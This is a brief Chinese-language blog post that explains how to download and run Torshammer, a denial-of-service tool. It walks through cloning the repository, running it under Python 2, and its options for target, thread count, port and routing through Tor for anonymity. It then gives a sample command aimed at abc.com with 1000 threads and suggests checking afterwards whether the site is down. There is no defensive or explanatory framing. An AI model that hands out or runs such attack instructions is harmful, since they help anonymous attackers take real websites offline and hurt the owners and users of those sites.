美文网首页
Torshammer

Torshammer

作者: 手捧樱花v | 来源:发表于2020-07-13 11:01 被阅读0次
    git clone https://github.com/dotfighter/torshammer.git
    cd torshammer
    python torshammer.py 这里支持python2 
    

    后面需要加的参数
    -t|--target <Hostname|IP>
    -r|--threads <Number of threads> Defaults to 256
    -p|--port <Web Server Port> Defaults to 80
    -T|--tor Enable anonymising through tor on 127.0.0.1:9050 定制攻击
    -h|--help Shows this help

    python torshammer.py -t abc.com -r 1000 -p 80
    

    isitdownrightnow用于验证是否挂掉

    相关文章

      网友评论

          本文标题:Torshammer

          本文链接:https://www.haomeiwen.com/subject/rzqacktx.html